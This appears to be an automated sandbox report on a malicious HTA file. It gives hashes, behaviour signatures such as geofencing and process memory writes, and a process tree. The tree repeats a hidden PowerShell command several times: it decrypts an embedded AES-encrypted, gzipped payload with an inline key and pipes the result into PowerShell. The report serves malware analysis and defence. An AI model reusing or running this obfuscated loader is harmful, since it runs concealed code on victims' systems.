Analysis

  • max time kernel
    165s
  • max time network
    179s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/10/2023, 03:58

General

  • Target

    faaf3eac037a198ddc992cde62e499d2a5b8dae2be55684552cfcd812887d05b_JC.hta

  • Size

    1.3MB

  • MD5

    8b78461ae5675e701bee1012494c6aae

  • SHA1

    bd724a33b983dc441f8b1f115d1900243c1b7755

  • SHA256

    faaf3eac037a198ddc992cde62e499d2a5b8dae2be55684552cfcd812887d05b

  • SHA512

    19e37c89f2a358560eaa664a976a1e787a33d93a6e1f72415b608b739106b5fc1da80ac6c7ac9869918694fc75547889d79458b9ae85838721727c74f4c68b2e

  • SSDEEP

    3072:RkpQ1CWDnNIS1Aoc2GpsWvJ6x+aUm952wog1+WoPWP9WDFdf:RkpqCWDNIfJ2GpskJnmf2woghdW3f

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\faaf3eac037a198ddc992cde62e499d2a5b8dae2be55684552cfcd812887d05b_JC.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4624
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $KblYpiat = 'AAAAAAAAAAAAAAAAAAAAAGyfC8LmTiTw1hxILnopJTNZC3F1eYtC9Ojnd/n+Z/WZTYhKpODlKxbr7y9+UJDbeubg/5SDgvXLy3Tpfpjx38xpAok7Or2zGQ34odIfBuS+ZN7zLpSo9+lFv1ae+zcfBne2ze3wgRmHVNOxqfK6ELpDLOvnBLTrmDOHy5qBzmh532o6yTqpRuC1D5Buke8z4VnjGe9xnLMNplfSIt/O86KllgGXwJvmHVBmQBZo7T4p8GI70bC7JrnLP1IxxK7ZEThOpWmpfzdiwLI+hP1tewBFAhxTx+hCQzQzWbJTXzh2UQCqaPv8BHmt5Vm5PrZiZGpx7gawEmNr7pVlHdN2goA03x+hZ2oTvcZxrWxQa8Zj6oYDVKhjcSQxx1Y7kNbcjVxoernr57UxH6GQzL1muaaa8FJmqUhtcQ/VPNRInZiZkeR0uZkXpy3AYGh3K3dLnVrxb9D2IjjsRjiq1H0fYPTMYM8M0+aAeX+JqFHGrykhdqFG4r43R5ireq28knBAUmad7f7Dxb6nFDX88PomPBgvJ8JB+Xx3sUj5FXYfb3AtM/i0vxGyd9tqnW46VMUMykmRLU24CpAc+p83o74wNwloeyhregEhGQ3x5r3Ve9B573G65n3H8aeUJYiH7wTsrq3WOW/cQN/5e7K0pdDgbCCS+qzk9+H1TuhXmEOv1OzqI4puPnWeh/J+bi/7zZe9X+x4PWlrIFW/umBdEwX4s652CSDjs+ImsCJ7QXQSrhFdkld2JxwbvvUB+sYC7YGKrXHG0af/QHSJK6EKsHpeH/ou/SGCZcwcEYgTGvvEWU3BHY5tugAEvBhNbYp+1vUNRbtKHEUOOwX71vlWrcK9In7qlAuYt/dnuXzCihqCPD1T/6RWaFv7gS4V4qCqHL3kGOM4ZWAX5A2oBRcywm+kGS+vy5QQ0mU3tiurD8LEhBOQbp3qx+Sjl+rREsI4YFhfluOnFVt+v3R0Zy+Hbdqgb0JeG+9+uCm+IVpadtxpejAVzHzccNrLM8FiXmYQLSqkXpIz0zLWSXiqxtHeAXpJYh9llQy52wMorYSIsYtsQEURReDJN0N5aiQFlyEdoVH07LqB6wP/lVZKADlgvwkLwjEhGkq+Fn625WNKJHdnHtyp';$LMxdlxRn = 'VENndXVCZENKdG1mWG1yUm9HekVXekxrZ3dmUEVPaXI=';$UHoFxWHQ = New-Object 'System.Security.Cryptography.AesManaged';$UHoFxWHQ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UHoFxWHQ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UHoFxWHQ.BlockSize = 128;$UHoFxWHQ.KeySize = 256;$UHoFxWHQ.Key = [System.Convert]::FromBase64String($LMxdlxRn);$LNXfG = [System.Convert]::FromBase64String($KblYpiat);$nLtrplDt = $LNXfG[0..15];$UHoFxWHQ.IV = $nLtrplDt;$IRbItUxBI = $UHoFxWHQ.CreateDecryptor();$jDfIlVYhX = $IRbItUxBI.TransformFinalBlock($LNXfG, 16, $LNXfG.Length - 16);$UHoFxWHQ.Dispose();$dpjEaJE = New-Object System.IO.MemoryStream( , $jDfIlVYhX );$VTWJtzK = New-Object System.IO.MemoryStream;$qFiZIoUUl = New-Object System.IO.Compression.GzipStream $dpjEaJE, ([IO.Compression.CompressionMode]::Decompress);$qFiZIoUUl.CopyTo( $VTWJtzK );$qFiZIoUUl.Close();$dpjEaJE.Close();[byte[]] $mxNScH = $VTWJtzK.ToArray();$CpVJRuyK = [System.Text.Encoding]::UTF8.GetString($mxNScH);$CpVJRuyK | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4056
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $KblYpiat = 'AAAAAAAAAAAAAAAAAAAAAGyfC8LmTiTw1hxILnopJTNZC3F1eYtC9Ojnd/n+Z/WZTYhKpODlKxbr7y9+UJDbeubg/5SDgvXLy3Tpfpjx38xpAok7Or2zGQ34odIfBuS+ZN7zLpSo9+lFv1ae+zcfBne2ze3wgRmHVNOxqfK6ELpDLOvnBLTrmDOHy5qBzmh532o6yTqpRuC1D5Buke8z4VnjGe9xnLMNplfSIt/O86KllgGXwJvmHVBmQBZo7T4p8GI70bC7JrnLP1IxxK7ZEThOpWmpfzdiwLI+hP1tewBFAhxTx+hCQzQzWbJTXzh2UQCqaPv8BHmt5Vm5PrZiZGpx7gawEmNr7pVlHdN2goA03x+hZ2oTvcZxrWxQa8Zj6oYDVKhjcSQxx1Y7kNbcjVxoernr57UxH6GQzL1muaaa8FJmqUhtcQ/VPNRInZiZkeR0uZkXpy3AYGh3K3dLnVrxb9D2IjjsRjiq1H0fYPTMYM8M0+aAeX+JqFHGrykhdqFG4r43R5ireq28knBAUmad7f7Dxb6nFDX88PomPBgvJ8JB+Xx3sUj5FXYfb3AtM/i0vxGyd9tqnW46VMUMykmRLU24CpAc+p83o74wNwloeyhregEhGQ3x5r3Ve9B573G65n3H8aeUJYiH7wTsrq3WOW/cQN/5e7K0pdDgbCCS+qzk9+H1TuhXmEOv1OzqI4puPnWeh/J+bi/7zZe9X+x4PWlrIFW/umBdEwX4s652CSDjs+ImsCJ7QXQSrhFdkld2JxwbvvUB+sYC7YGKrXHG0af/QHSJK6EKsHpeH/ou/SGCZcwcEYgTGvvEWU3BHY5tugAEvBhNbYp+1vUNRbtKHEUOOwX71vlWrcK9In7qlAuYt/dnuXzCihqCPD1T/6RWaFv7gS4V4qCqHL3kGOM4ZWAX5A2oBRcywm+kGS+vy5QQ0mU3tiurD8LEhBOQbp3qx+Sjl+rREsI4YFhfluOnFVt+v3R0Zy+Hbdqgb0JeG+9+uCm+IVpadtxpejAVzHzccNrLM8FiXmYQLSqkXpIz0zLWSXiqxtHeAXpJYh9llQy52wMorYSIsYtsQEURReDJN0N5aiQFlyEdoVH07LqB6wP/lVZKADlgvwkLwjEhGkq+Fn625WNKJHdnHtyp';$LMxdlxRn = 'VENndXVCZENKdG1mWG1yUm9HekVXekxrZ3dmUEVPaXI=';$UHoFxWHQ = New-Object 'System.Security.Cryptography.AesManaged';$UHoFxWHQ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UHoFxWHQ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UHoFxWHQ.BlockSize = 128;$UHoFxWHQ.KeySize = 256;$UHoFxWHQ.Key = [System.Convert]::FromBase64String($LMxdlxRn);$LNXfG = [System.Convert]::FromBase64String($KblYpiat);$nLtrplDt = $LNXfG[0..15];$UHoFxWHQ.IV = $nLtrplDt;$IRbItUxBI = $UHoFxWHQ.CreateDecryptor();$jDfIlVYhX = $IRbItUxBI.TransformFinalBlock($LNXfG, 16, $LNXfG.Length - 16);$UHoFxWHQ.Dispose();$dpjEaJE = New-Object System.IO.MemoryStream( , $jDfIlVYhX );$VTWJtzK = New-Object System.IO.MemoryStream;$qFiZIoUUl = New-Object System.IO.Compression.GzipStream $dpjEaJE, ([IO.Compression.CompressionMode]::Decompress);$qFiZIoUUl.CopyTo( $VTWJtzK );$qFiZIoUUl.Close();$dpjEaJE.Close();[byte[]] $mxNScH = $VTWJtzK.ToArray();$CpVJRuyK = [System.Text.Encoding]::UTF8.GetString($mxNScH);$CpVJRuyK | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3776
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $KblYpiat = 'AAAAAAAAAAAAAAAAAAAAAGyfC8LmTiTw1hxILnopJTNZC3F1eYtC9Ojnd/n+Z/WZTYhKpODlKxbr7y9+UJDbeubg/5SDgvXLy3Tpfpjx38xpAok7Or2zGQ34odIfBuS+ZN7zLpSo9+lFv1ae+zcfBne2ze3wgRmHVNOxqfK6ELpDLOvnBLTrmDOHy5qBzmh532o6yTqpRuC1D5Buke8z4VnjGe9xnLMNplfSIt/O86KllgGXwJvmHVBmQBZo7T4p8GI70bC7JrnLP1IxxK7ZEThOpWmpfzdiwLI+hP1tewBFAhxTx+hCQzQzWbJTXzh2UQCqaPv8BHmt5Vm5PrZiZGpx7gawEmNr7pVlHdN2goA03x+hZ2oTvcZxrWxQa8Zj6oYDVKhjcSQxx1Y7kNbcjVxoernr57UxH6GQzL1muaaa8FJmqUhtcQ/VPNRInZiZkeR0uZkXpy3AYGh3K3dLnVrxb9D2IjjsRjiq1H0fYPTMYM8M0+aAeX+JqFHGrykhdqFG4r43R5ireq28knBAUmad7f7Dxb6nFDX88PomPBgvJ8JB+Xx3sUj5FXYfb3AtM/i0vxGyd9tqnW46VMUMykmRLU24CpAc+p83o74wNwloeyhregEhGQ3x5r3Ve9B573G65n3H8aeUJYiH7wTsrq3WOW/cQN/5e7K0pdDgbCCS+qzk9+H1TuhXmEOv1OzqI4puPnWeh/J+bi/7zZe9X+x4PWlrIFW/umBdEwX4s652CSDjs+ImsCJ7QXQSrhFdkld2JxwbvvUB+sYC7YGKrXHG0af/QHSJK6EKsHpeH/ou/SGCZcwcEYgTGvvEWU3BHY5tugAEvBhNbYp+1vUNRbtKHEUOOwX71vlWrcK9In7qlAuYt/dnuXzCihqCPD1T/6RWaFv7gS4V4qCqHL3kGOM4ZWAX5A2oBRcywm+kGS+vy5QQ0mU3tiurD8LEhBOQbp3qx+Sjl+rREsI4YFhfluOnFVt+v3R0Zy+Hbdqgb0JeG+9+uCm+IVpadtxpejAVzHzccNrLM8FiXmYQLSqkXpIz0zLWSXiqxtHeAXpJYh9llQy52wMorYSIsYtsQEURReDJN0N5aiQFlyEdoVH07LqB6wP/lVZKADlgvwkLwjEhGkq+Fn625WNKJHdnHtyp';$LMxdlxRn = 'VENndXVCZENKdG1mWG1yUm9HekVXekxrZ3dmUEVPaXI=';$UHoFxWHQ = New-Object 'System.Security.Cryptography.AesManaged';$UHoFxWHQ.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UHoFxWHQ.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UHoFxWHQ.BlockSize = 128;$UHoFxWHQ.KeySize = 256;$UHoFxWHQ.Key = [System.Convert]::FromBase64String($LMxdlxRn);$LNXfG = [System.Convert]::FromBase64String($KblYpiat);$nLtrplDt = $LNXfG[0..15];$UHoFxWHQ.IV = $nLtrplDt;$IRbItUxBI = $UHoFxWHQ.CreateDecryptor();$jDfIlVYhX = $IRbItUxBI.TransformFinalBlock($LNXfG, 16, $LNXfG.Length - 16);$UHoFxWHQ.Dispose();$dpjEaJE = New-Object System.IO.MemoryStream( , $jDfIlVYhX );$VTWJtzK = New-Object System.IO.MemoryStream;$qFiZIoUUl = New-Object System.IO.Compression.GzipStream $dpjEaJE, ([IO.Compression.CompressionMode]::Decompress);$qFiZIoUUl.CopyTo( $VTWJtzK );$qFiZIoUUl.Close();$dpjEaJE.Close();[byte[]] $mxNScH = $VTWJtzK.ToArray();$CpVJRuyK = [System.Text.Encoding]::UTF8.GetString($mxNScH);$CpVJRuyK
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3196

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

          Filesize

          1KB

          MD5

          def65711d78669d7f8e69313be4acf2e

          SHA1

          6522ebf1de09eeb981e270bd95114bc69a49cda6

          SHA256

          aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

          SHA512

          05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          15KB

          MD5

          fa88d5872a83468347af7904f0dd3cbe

          SHA1

          72a670ebeae10f7d47a2bf0cbb61fed58dcfde23

          SHA256

          2f7458eb4132f76d97b2f940ff4c314fb3ebdf5184fec6105d3b97a8ed1da36a

          SHA512

          cf0719e1e310659c7504a19d56f478d8a365b121bc4c8f2ecd22b72b49d5647413d82ebd8720a68a077e33fdc20cc71a271b9717821a4124765a44e0c7b72fd2

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yyxf42vj.o30.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/3196-64-0x00000000711A0000-0x0000000071950000-memory.dmp

          Filesize

          7.7MB

        • memory/3196-61-0x0000000007A30000-0x00000000080AA000-memory.dmp

          Filesize

          6.5MB

        • memory/3196-59-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

          Filesize

          64KB

        • memory/3196-38-0x0000000005A70000-0x0000000005DC4000-memory.dmp

          Filesize

          3.3MB

        • memory/3196-37-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

          Filesize

          64KB

        • memory/3196-34-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

          Filesize

          64KB

        • memory/3196-33-0x00000000711A0000-0x0000000071950000-memory.dmp

          Filesize

          7.7MB

        • memory/3776-65-0x00000000711A0000-0x0000000071950000-memory.dmp

          Filesize

          7.7MB

        • memory/3776-58-0x00000000060C0000-0x0000000006104000-memory.dmp

          Filesize

          272KB

        • memory/3776-87-0x00000000711A0000-0x0000000071950000-memory.dmp

          Filesize

          7.7MB

        • memory/3776-85-0x0000000007C10000-0x0000000007C21000-memory.dmp

          Filesize

          68KB

        • memory/3776-84-0x0000000007490000-0x000000000749A000-memory.dmp

          Filesize

          40KB

        • memory/3776-83-0x0000000007B60000-0x0000000007C03000-memory.dmp

          Filesize

          652KB

        • memory/3776-82-0x00000000073E0000-0x00000000073FE000-memory.dmp

          Filesize

          120KB

        • memory/3776-71-0x000000006DA60000-0x000000006DAAC000-memory.dmp

          Filesize

          304KB

        • memory/3776-72-0x000000006DDD0000-0x000000006E124000-memory.dmp

          Filesize

          3.3MB

        • memory/3776-70-0x0000000007400000-0x0000000007432000-memory.dmp

          Filesize

          200KB

        • memory/3776-69-0x000000007FA40000-0x000000007FA50000-memory.dmp

          Filesize

          64KB

        • memory/3776-68-0x0000000004760000-0x0000000004770000-memory.dmp

          Filesize

          64KB

        • memory/3776-66-0x0000000004760000-0x0000000004770000-memory.dmp

          Filesize

          64KB

        • memory/3776-67-0x0000000004760000-0x0000000004770000-memory.dmp

          Filesize

          64KB

        • memory/3776-62-0x0000000004760000-0x0000000004770000-memory.dmp

          Filesize

          64KB

        • memory/3776-35-0x00000000711A0000-0x0000000071950000-memory.dmp

          Filesize

          7.7MB

        • memory/3776-36-0x0000000004760000-0x0000000004770000-memory.dmp

          Filesize

          64KB

        • memory/3776-60-0x0000000006BE0000-0x0000000006C56000-memory.dmp

          Filesize

          472KB

        • memory/4056-28-0x00000000052F0000-0x0000000005300000-memory.dmp

          Filesize

          64KB

        • memory/4056-18-0x00000000067E0000-0x00000000067FE000-memory.dmp

          Filesize

          120KB

        • memory/4056-5-0x0000000005820000-0x0000000005842000-memory.dmp

          Filesize

          136KB

        • memory/4056-3-0x00000000052F0000-0x0000000005300000-memory.dmp

          Filesize

          64KB

        • memory/4056-6-0x00000000058C0000-0x0000000005926000-memory.dmp

          Filesize

          408KB

        • memory/4056-2-0x00000000052F0000-0x0000000005300000-memory.dmp

          Filesize

          64KB

        • memory/4056-7-0x0000000006190000-0x00000000061F6000-memory.dmp

          Filesize

          408KB

        • memory/4056-1-0x00000000711A0000-0x0000000071950000-memory.dmp

          Filesize

          7.7MB

        • memory/4056-0-0x0000000005230000-0x0000000005266000-memory.dmp

          Filesize

          216KB

        • memory/4056-17-0x0000000006300000-0x0000000006654000-memory.dmp

          Filesize

          3.3MB

        • memory/4056-32-0x00000000711A0000-0x0000000071950000-memory.dmp

          Filesize

          7.7MB

        • memory/4056-4-0x0000000005930000-0x0000000005F58000-memory.dmp

          Filesize

          6.2MB

        • memory/4056-19-0x0000000006830000-0x000000000687C000-memory.dmp

          Filesize

          304KB

        • memory/4056-27-0x0000000007E10000-0x00000000083B4000-memory.dmp

          Filesize

          5.6MB

        • memory/4056-26-0x0000000006D10000-0x0000000006D32000-memory.dmp

          Filesize

          136KB

        • memory/4056-25-0x0000000006CC0000-0x0000000006CDA000-memory.dmp

          Filesize

          104KB

        • memory/4056-24-0x00000000077C0000-0x0000000007856000-memory.dmp

          Filesize

          600KB

        • memory/4056-23-0x00000000052F0000-0x0000000005300000-memory.dmp

          Filesize

          64KB

        • memory/4056-22-0x00000000052F0000-0x0000000005300000-memory.dmp

          Filesize

          64KB

        • memory/4056-21-0x00000000052F0000-0x0000000005300000-memory.dmp

          Filesize

          64KB

        • memory/4056-20-0x00000000711A0000-0x0000000071950000-memory.dmp

          Filesize

          7.7MB